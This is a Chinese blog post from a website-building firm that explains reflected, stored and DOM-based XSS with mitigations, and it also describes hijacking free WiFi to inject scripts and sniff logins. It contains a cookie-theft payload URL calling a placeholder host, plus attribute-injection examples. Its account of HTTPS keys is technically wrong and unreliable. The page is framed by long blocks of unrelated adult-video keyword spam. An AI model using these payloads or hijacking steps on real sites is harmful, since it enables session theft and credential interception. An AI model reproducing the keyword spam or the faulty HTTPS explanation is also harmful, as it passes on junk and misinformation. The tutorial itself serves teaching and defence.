99国产精品免费视频观看_日韩精品在线免费_欧美国产日韩二区_天天超碰亚洲

億萬聯(lián)合 — 專業(yè)網站建設服務商 17786980340
您的位置:首頁 > 資訊 > 網絡學堂

網站安全之XSS攻擊

發(fā)布時間:2017年08月07日作者:波哥 瀏覽:11196

XSS(cross-site scripting跨域腳本攻擊)攻擊是最常見的Web攻擊,其重點是“跨域”和“客戶端執(zhí)行”。

有人將XSS攻擊分為三種,分別是:

1. Reflected XSS(基于反射的XSS攻擊)

2. Stored XSS(基于存儲的XSS攻擊)

3. DOM-based or local XSS(基于DOM或本地的XSS攻擊)


Reflected XSS

基于反射的XSS攻擊,主要依靠站點服務端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊。

例子:

1. 做個假設,當亞馬遜在搜索書籍,搜不到書的時候顯示提交的名稱。

2. 在搜索框搜索內容,填入“<script>alert('handsome boy')</script>”, 點擊搜索。

3. 當前端頁面沒有對返回的數(shù)據進行過濾,直接顯示在頁面上, 這時就會alert那個字符串出來。

4. 進而可以構造獲取用戶cookies的地址,通過QQ群或者垃圾郵件,來讓其他人點擊這個地址:

http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>

PS:這個地址當然是沒效的,只是舉例子而已。

結論:

如果只是1、2、3步做成功,那也只是自己折騰自己而已,如果第4步能做成功,才是個像樣的XSS攻擊。

開發(fā)安全措施:

1. 前端在顯示服務端數(shù)據時候,不僅是標簽內容需要過濾、轉義,就連屬性值也都可能需要。

2. 后端接收請求時,驗證請求是否為攻擊請求,攻擊則屏蔽。

例如:

標簽:

<span><script>alert('handsome boy')</script></span>
轉義
<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>
屬性:

如果一個input的value屬性值是

瑯琊榜" onclick="javascript:alert('handsome boy')
就可能出現(xiàn)

<input type="text" value="瑯琊榜" onclick="javascript:alert('handsome boy')">

點擊input導致攻擊腳本被執(zhí)行,解決方式可以對script或者雙引號進行過濾。


Stored XSS

基于存儲的XSS攻擊,是通過發(fā)表帶有惡意跨域腳本的帖子/文章,從而把惡意腳本存儲在服務器,每個訪問該帖子/文章的人就會觸發(fā)執(zhí)行。

例子:

1. 發(fā)一篇文章,里面包含了惡意腳本

今天天氣不錯啊!<script>alert('handsome boy')</script>
2. 后端沒有對文章進行過濾,直接保存文章內容到數(shù)據庫。


3. 當其他看這篇文章的時候,包含的惡意腳本就會執(zhí)行。

PS:因為大部分文章是保存整個HTML內容的,前端顯示時候也不做過濾,就極可能出現(xiàn)這種情況。

結論:

后端盡可能對提交數(shù)據做過濾,在場景需求而不過濾的情況下,前端就需要做些處理了。

開發(fā)安全措施:

1. 首要是服務端要進行過濾,因為前端的校驗可以被繞過。

2. 當服務端不校驗時候,前端要以各種方式過濾里面可能的惡意腳本,例如script標簽,將特殊字符轉換成HTML編碼。

DOM-based or local XSS

基于DOM或本地的XSS攻擊。一般是提供一個免費的wifi,但是提供免費wifi的網關會往你訪問的任何頁面插入一段腳本或者是直接返回一個釣魚頁面,從而植入惡意腳本。這種直接存在于頁面,無須經過服務器返回就是基于本地的XSS攻擊。


例子1:
1. 提供一個免費的wifi。
1. 開啟一個特殊的DNS服務,將所有域名都解析到我們的電腦上,并把Wifi的DHCP-DNS設置為我們的電腦IP。
2. 之后連上wifi的用戶打開任何網站,請求都將被我們截取到。我們根據http頭中的host字段來轉發(fā)到真正服務器上。
3. 收到服務器返回的數(shù)據之后,我們就可以實現(xiàn)網頁腳本的注入,并返回給用戶。
4. 當注入的腳本被執(zhí)行,用戶的瀏覽器將依次預加載各大網站的常用腳本庫。


PS:例子和圖片來自,http://www.cnblogs.com/index-html/p/wifi_hijack_3.html 不是我寫的,請注意!
這個其實就是wifi流量劫持,中間人可以看到用戶的每一個請求,可以在頁面嵌入惡意代碼,使用惡意代碼獲取用戶的信息,可以返回釣魚頁面。



例子2:
1. 還是提供一個免費wifi
2. 在我們電腦上進行抓包
3. 分析數(shù)據,可以獲取用戶的微信朋友圈、郵箱、社交網站帳號數(shù)據(HTTP)等。


PS:這個是我的測試,在51job頁面登錄時進行抓包,可以獲取帳號密碼。



結論:
這攻擊其實跟網站本身沒有什么關系,只是數(shù)據被中間人獲取了而已,而由于HTTP是明文傳輸?shù)模允菢O可能被竊取的。


開發(fā)安全措施:
1. 使用HTTPS!就跟我前面《HTTP與HTTPS握手的那些事》這篇文章說的,HTTPS會在請求數(shù)據之前進行一次握手,使得客戶端與服務端都有一個私鑰,服務端用這個私鑰加密,客戶端用這個私鑰解密,這樣即使數(shù)據被人截取了,也是加密后的數(shù)據。

總結

XSS攻擊的特點就是:盡一切辦法在目標網站上執(zhí)行非目標網站上原有的腳本(某篇文章說的)。本地的XSS攻擊的示例2其實不算XSS攻擊,只是簡單流量劫持。前兩種XSS攻擊是我們開發(fā)時候要注意的,而流量劫持的則可以使用HTTPS提高安全性。

870
分類:

您還沒有登錄,請先登錄

4008-4008-80

027-87827780

請點擊QQ圖標咨詢客服;為避免丟失消息,請?zhí)砑観Q好友
提交需求
99国产精品免费视频观看_日韩精品在线免费_欧美国产日韩二区_天天超碰亚洲
欧美视频一区二区| 欧美二区不卡| 国产婷婷色一区二区三区在线| 国产精品高潮久久| 国产日韩亚洲| 亚洲第一毛片| 亚洲毛片在线| 翔田千里一区二区| 久久亚洲欧洲| 欧美三级午夜理伦三级中视频| 国产精品久久久久久久一区探花 | 在线看视频不卡| 日韩亚洲不卡在线| 欧美影院午夜播放| 欧美精品久久天天躁| 国产精品入口日韩视频大尺度| 一区二区三区在线视频免费观看| 亚洲人屁股眼子交8| 午夜精品久久久久久99热软件| 久久精品五月婷婷| 欧美日韩一区二区免费视频| 国产伦精品一区二区三区四区免费 | 一区二区视频免费在线观看 | 日韩网站在线| 久久高清免费观看| 欧美日韩一区二区三区| 一区二区三区中文在线观看 | 欧美黄色日本| 国外成人在线| 午夜精品一区二区三区在线| 欧美国产在线电影| 国产一区二区三区电影在线观看| 一本色道久久综合亚洲精品婷婷| 久久亚洲一区二区| 国产麻豆日韩欧美久久| 99国产成+人+综合+亚洲欧美| 久久一区二区三区国产精品| 国产伦精品一区二区三区照片91| 日韩一二在线观看| 欧美69wwwcom| 在线免费观看欧美| 欧美在线短视频| 国产精品日韩| 亚洲一区二区三区高清 | 亚洲第一在线| 久久丁香综合五月国产三级网站| 国产精品高清网站| 一本久道综合久久精品| 免费观看在线综合| 国产欧美日韩一区二区三区在线观看 | 国产免费成人| 一区二区三区福利| 欧美激情第3页| 激情久久婷婷| 久久精品免费| 国产欧美一区二区在线观看| 亚洲午夜未删减在线观看| 欧美日韩美女在线| 9久草视频在线视频精品| 欧美电影资源| 精品盗摄一区二区三区| 久久久久高清| 尤物在线观看一区| 久久久av水蜜桃| 国模精品娜娜一二三区| 久久久国产成人精品| 国产私拍一区| 亚洲自拍偷拍麻豆| 国产精品一区免费视频| 亚洲自拍偷拍视频| 国产精品久久久久9999| 亚洲综合丁香| 国产精品老牛| 亚洲欧美日韩一区二区| 国产日韩欧美中文在线播放| 亚洲在线成人| 国产精品素人视频| 午夜一级久久| 国产一区二区三区在线观看精品| 久久久999精品视频| 国产精品亚洲视频| 亚洲欧美日韩国产中文| 国产精品日韩欧美一区二区三区| 亚洲影院免费观看| 国产一区二区日韩| 久久青青草综合| 亚洲精选一区| 国产精品色网| 久久综合九色综合欧美就去吻| 伊人夜夜躁av伊人久久| 欧美日韩国产限制| 亚洲图片欧美午夜| 国内精品国产成人| 另类激情亚洲| 日韩视频欧美视频| 国产欧美日韩中文字幕在线| 嫩草国产精品入口| 亚洲一级网站| 亚洲全黄一级网站| 国产精品国产三级国产aⅴ浪潮 | 欧美在线观看视频| 亚洲国产成人久久| 国产精品av久久久久久麻豆网| 亚洲自拍三区| 亚洲欧洲在线看| 国产精品一区二区三区四区五区| 久久精品在线观看| 99视频在线观看一区三区| 国产有码一区二区| 欧美天天影院| 欧美成年视频| 欧美制服丝袜| 一区二区高清在线观看| 狠狠色丁香久久婷婷综合丁香| 欧美日本中文| 久久青草欧美一区二区三区| 亚洲综合三区| 亚洲精品在线观看视频| 国产一区二区激情| 国产精品igao视频网网址不卡日韩| 噜噜噜91成人网| 欧美影院视频| 亚洲影院污污.| 99精品久久| 最新成人av网站| 精品二区视频| 国产亚洲欧美日韩日本| 国产精品久久久久久亚洲调教| 欧美黄色免费网站| 老司机精品久久| 久久久999国产| 欧美中在线观看| 午夜视频在线观看一区二区| 中国女人久久久| 亚洲精品一区中文| 亚洲精品日韩在线| 亚洲精品一区二区在线| 91久久嫩草影院一区二区| 狠狠综合久久| 国产一区二区三区日韩| 国产美女精品免费电影| 国产精品久久久久久久久果冻传媒 | 亚洲欧洲在线观看| 黄色精品在线看| 国外视频精品毛片| 国产午夜精品一区二区三区视频| 国产精品人人做人人爽| 国产精品v片在线观看不卡| 欧美日韩激情网| 欧美另类高清视频在线| 欧美日韩亚洲在线| 欧美午夜片在线观看| 欧美性生交xxxxx久久久| 欧美日一区二区在线观看 | 91久久精品一区二区三区| 亚洲国产婷婷| 亚洲国产一区二区精品专区| 亚洲激情视频网| 亚洲三级免费| av不卡在线观看| 亚洲香蕉网站| 性欧美暴力猛交69hd| 欧美一区二视频| 久久久欧美精品| 欧美激情性爽国产精品17p| 欧美日韩国产综合久久| 国产精品国内视频| 国产视频一区三区| 亚洲大片av| 日韩视频一区二区在线观看 | 欧美在线1区| 久久综合999| 欧美激情视频一区二区三区免费 | 久久激情视频久久| 久久一区视频| 欧美日韩国产在线播放网站| 国产精品高潮粉嫩av| 国产日韩欧美不卡| 精品51国产黑色丝袜高跟鞋| 亚洲精品乱码久久久久久蜜桃91 | 99re6热在线精品视频播放速度 | 亚洲精品一区久久久久久| 在线视频欧美日韩| 午夜精品影院| 狂野欧美激情性xxxx| 欧美日韩在线观看一区二区三区| 国产精品爽爽ⅴa在线观看| 精品成人一区二区| 99re热精品| 欧美在线亚洲在线| 模特精品在线| 国产精品欧美一区喷水| 伊人久久婷婷色综合98网| 亚洲精品看片| 欧美一区二区三区免费大片| 欧美成人黑人xx视频免费观看| 国产精品女主播在线观看| 亚洲激情二区| 久久国产精品99精品国产| 欧美日韩亚洲一区二区|